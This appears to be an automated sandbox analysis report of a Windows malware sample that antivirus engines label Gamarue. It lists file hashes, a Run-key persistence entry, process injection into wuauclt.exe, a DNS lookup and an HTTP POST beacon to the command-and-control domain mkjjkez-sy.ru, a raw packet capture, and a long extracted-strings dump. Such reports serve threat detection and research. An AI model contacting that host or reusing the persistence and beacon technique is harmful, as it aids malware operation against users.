Analysis Date2014-01-29 11:42:32
MD5722f7207e5134be164df092aa78536ae
SHA11a2d342c802bb3708bb753e0aebaa8e70fa1dbc3

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.code md5: 0d15f84766bcaa9f2c95a620f64d8828 sha1: 88a502e3660fcf01e534f87ace02bf77e4286217 size: 10240
Section.text md5: 0904e361fca756ad4be81975c3b8cc5d sha1: 91f5c8721dde2fb70b03e2e15011ba532c5fe528 size: 14848
Section.rdata md5: 606bf741eda001a5604f3c45d7286bf9 sha1: 6869ab443fcc75cdcb6d882afabdc346ceab0f17 size: 512
Section.data md5: f99b90475c2b14454328332542c049d6 sha1: 8364ee5d65782f6f4472218785a07b8e7d38703b size: 3072
Section.rsrc md5: 151e6eadbb44efe9b2ae63b0d0098358 sha1: 20478a5ecb04ddfab2279794056d1e7fab57c617 size: 24576
Timestamp1982-02-15 13:53:36
VersionFileVersion: 9.9
ProductName: zddfrhhhrzef
ProductVersion: 9.9
CompanyName: tghzddzbcbb
PEhash81ec29d31b3930da6dad456187e9aaf2bd8bb658
AVmcafeeRDN/Spybot.bfr!h
AVavgPSW.Generic12.VPN
AVmsseWorm:Win32/Gamarue

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\msdxygra.com\\x00
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\All Users\Local Settings\Temp\msdxygra.com
Creates File\Device\Afd\Endpoint
Deletes FileC:\1A2D34~1.EXE
Creates Mutex3227095050

Network Details:

DNSupdate.microsoft.com.nsatc.net
Type: A
65.55.163.222
DNSmkjjkez-sy.ru
Type: A
144.76.144.27
DNSwww.update.microsoft.com
Type: A
HTTP POSThttp://mkjjkez-sy.ru/andro/image.php
User-Agent: Mozilla/4.0
Flows TCP192.168.1.1:1031 ➝ 65.55.163.222:80
Flows UDP192.168.1.1:1032 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1033 ➝ 144.76.144.27:80

Raw Pcap
0x00000000 (00000)   504f5354 202f616e 64726f2f 696d6167   POST /andro/imag
0x00000010 (00016)   652e7068 70204854 54502f31 2e310d0a   e.php HTTP/1.1..
0x00000020 (00032)   486f7374 3a206d6b 6a6a6b65 7a2d7379   Host: mkjjkez-sy
0x00000030 (00048)   2e72750d 0a557365 722d4167 656e743a   .ru..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 0d0a436f    Mozilla/4.0..Co
0x00000050 (00080)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000060 (00096)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x00000070 (00112)   726d2d75 726c656e 636f6465 640d0a43   rm-urlencoded..C
0x00000080 (00128)   6f6e7465 6e742d4c 656e6774 683a2038   ontent-Length: 8
0x00000090 (00144)   380d0a43 6f6e6e65 6374696f 6e3a2063   8..Connection: c
0x000000a0 (00160)   6c6f7365 0d0a0d0a 66484741 54384133   lose....fHGAT8A3
0x000000b0 (00176)   2b6a6e65 6e435231 31717275 416a375a   +jnenCR11qruAj7Z
0x000000c0 (00192)   524c7843 4f316137 38324877 79535748   RLxCO1a782HwySWH
0x000000d0 (00208)   6f584e36 2b556648 57743635 586a6341   oXN6+UfHWt65XjcA
0x000000e0 (00224)   7662446e 50776b78 4a386772 6f41536c   vbDnPwkxJ8groASl
0x000000f0 (00240)   4e675365 6f486d55 46332b6b 6b766761   NgSeoHmUF3+kkvga
0x00000100 (00256)                                         


Strings
........????.

100704b0
CompanyName
FileVersion
ProductName
ProductVersion
StringFileInfo
tghzddzbcbb
Translation
VarFileInfo
VS_VERSION_INFO
zddfrhhhrzef
|{{{{{{
  *//)
;\$$|)
											
0/ag`c^9
0jjjjjjjjjjj
;\$(											1
.-12z&&&
#<14MH
29z498ef9zef
3MMMMMNK4-
4875522189754
											4875522189754
4875522189754'
.4875522189754222222222222
487552218975448998489445674875522189754\
5S/\P0Y
7:a_]<yjjjjj
7:a_]<yjjjjjjjjjjjjjjjjjjjjjjjjj
7lmmnb
\$8+\$
86tCf|
////	+8}j
////	+8}jjjjjjjjjj
/////+8}jjjjjjjjjjjjjjjjjjjjj
8~{jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj&0
(9P|H8
accept
AlphaBlend
AMQQQRH<
:a_]<yjjjjj
b>0/ag`c^9
BitBlt
.;}cav
C_dcHj
C_dcHz
C_dcHzjjjjjjjjj
_CIacos
_CIatan
CloseHandle
closesocket
CoInitialize
COMCTL32.DLL
CoUninitialize
CreateBitmap
CreateCompatibleDC
CreateDIBSection
CreateFileA
CX[\^^^^^\[K'jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj!PZ[^cdeec^\?
CX[\^^^^^\[K'jjjjjjjjyD
CX[\^^^^^\[K' jj!PZ[^^eeec^\?
CZ\[<{ll CZ\[<
@.data
DDRAW.DLL
DeleteCriticalSection
DeleteDC
DeleteMenu
DeleteObject
DestroyAcceleratorTable
DestroyIcon
DestroyWindow
Dh["}~
DirectDrawCreateEx
DllGetVersion
;\$Dux
D$ VPSj
Ejjjjjwwt
EnterCriticalSection
ExitProcess
+f6y/vP1qKj+vK2s+Q==
fclose
FillRect
FreeLibrary
g7LQpaum6s+v4O3Wq5XgqLKu9fc=
GDI32.DLL
GetCurrentThread
GetCursorInfo
GetDeviceCaps
GetDIBits
GetModuleHandleA
GetObjectA
GetObjectType
GetProcAddress
GetStockObject
GetVersionExA
GetWindow
g)m=/3
>H2rqf
haPku4er9val
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HQRSSSSSRQQ;~jjj
HQRSSSSSRQQ;~jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
HQRSSSSSRQQ;~jyyyyylo
HSTTUUTTTSR6 jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
HSTTUUUTTSR6 jjj
HSTTUUUTTSR6 jjjjjjllllljjjjjj
HTWXWWWXWTT2 jj
HTWXWWWXWTT2 jjjjjjjyD
HTWXWWXXWTT2 jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
}Ic:=d
InitCommonControlsEx
InitializeCriticalSection
?InitOnceExecuteOnce
ioctlsocket
iqPxhqmj7/Wjw/P1qIjkpqOG
iqPxja+r/8qv//8=
iqPxn661//iixvX3uaP9vw==
iqrqqaer2/Wq6vk=
iqrqqaer3Ouj4A==
IsAppThemed
JAtB1'
{J-?Ew
jG @D!
-$j*<GH<'$$$$<GH<
 jj *//)
{jjj{0
#jjjj|
+ jjjj{{{}
{jjjj1,
jjjj3,
~ {{jjjjj{
=jjjjj
jjjjj{{{{{|
/jjjjjj
"jjjjjj
{jjjjjj
#jjjjjj3MMMMMNK4-
=jjjjjjj
)+@( jjjjjjj{{
jjjjjjjjj
" {{jjjjjjjjj
)	#jjjjjjjjj
}jjjjjjjjj
jj    jjjjj    jj 
jjjjjj}}}|jjj
jjjjjjjjj*<GH<
)+@({jjjjjjjjjj
/jjjjjjjjjjj
 jjjjjjjjjjjj
{jjjjjjjjj{{{{{jjjjj1,
/jjjjjjjjjjjjjjj
{jjjjjjjjjjjjjjjj
" jjjjjjjjjjjjjjjj{0
{jjjjjjjjjjjjjjjjj
+ jjjjjjjjjjjjjjjjj
 jjjjjjjjjjjjjjjjjj{
~   jjjjjjjjjjjjjjjjjjjj{{{}
+ jjjjjjjjjjjjjjjjjjjj{
jjjjjjjjjjjjjjjjjjjjj
)	#jjjjjjjjjjjjjjjjjjjjj
jjjjjjjjjjjjjjjjjjjjjj
|jjjjjjjjjjjjjjjjjjjjjj
 jjjjjjjjjjjjjjjjjjjjjjj
+jjjjjjjjjjjjjjjjjjjjjjjj
{jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
$jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
{jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1,
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
#jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj3MMMMMNK4-
)+@( jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj{{{{{jjjjjjjjjjjjjjj}}}}}jjjjj
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj{{{{{{jjjjjjjjjjjjjjjjjjjjjjjjj{{{{{{jjjjjjjj{{{}
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj	LLLTA
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjxxxxx
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjxr0VY_efhfec]?
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjxxx
jjjjjjjjjjjjjjjjjjjjjjjjj@LLN<<
jjjjjjjjyD
jjjjjjjjyyy
jjjjjjj	LLLTA
jjjjj	LLN<
jjjjj!PZ[^^eeec^\?
jjjjjx
|{{jjjjjxxxxxx
jjjjwr0VY_efhfec]?
jjjjyD
jj%r0VY_efhfec]?
jqfpp5Gu9P2p8srroqXE
jqrquKOB8/Wj
jqrquKOP+/ei6f8=
jrTgqrKi3PCq4Ns=
jrTgqrKiyuup5v/qvoc=
\$\K;\$(
Kernel32.dll
KERNEL32.dll
KJ32_e
KRSTTSR<
KWZ[[[X<
L5mt;}
LeaveCriticalSection
|&	LLLTA
LoadCursorA
LoadIconA
LoadLibraryA
* luQ-
m6/3v7Om9tiq6fX6iL4=
malloc
maP3pq+p++2j1ej2rqP2uA==
memcmp
memcpy
memmove
memset
mLXgufX1
mnyyyyyj
=MQQQQQQNI<
=MQQQQQQQI<
mrTsv6OX6Pal4OnqgKPopLS+
msimg32.dll
MSVCRT.dll
n6P2vquizvG04Pv9
n6Pkr4Cu9vw=
nn}}}}	LLN<<
N@Pa-)Q4
nqPxn661//iixvX3uaP9vw==
o7Lhp6o=
OLE32.DLL
OUUWWUU<
PB_DropAccept
PBMGu2
PB_WindowID
pqP3paOrqas=
"PU d{
`.rdata
recvfrom
RemovePropA
RevokeDragDrop
'r/Pq&"
s_BXan=
SelectObject
SendMessageA
SetActiveWindow
SetEndOfFile
SetFilePointer
SetMenu
SetPixel
SFLEu)
sprintf
sqqsv1
strcat
strcpy
_stricmp
strlen
s+veu_@
t+9.u/
`.text
TH$1\~
!This program cannot be run in DOS MODE.
TlsAlloc
UnregisterClassA
USER32.DLL
?UUUUUU
UWXXZZZXXWU. jj
UWXXZZZXXWU. jjjjjjjyD
UWXXZZZXXXU. jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
uxtheme.dll
VBZP}+
@vR`b^`
w7-PZ/3C
W[]cc\[<
WideCharToMultiByte
WindowClass_%d
WriteFile
WSACleanup
WSAGetLastError
WSAStartup
WSOCK32.DLL
wwwpwwwpx
wwwwwp
wwwwww
wwwwwwp
:WX[[\\\[[XJ' jj
:WX[[\\\[[XJ' jjjjjjjyD
:WXZ[\\\[[XJ' jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
Y\ceed\<#j
yDDDFlokmniDDD
Y\deed\<#jjjjjjjjjjjjjjjjjjjjj
Y\deed\<#jjjjyD
YJ,?E&
yjjjjjjjjj
yjjjjjjjjjjjjjjjjjjjjjj
Y`:ndo
YYQ*7}&3
yyyllllyyy
zjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj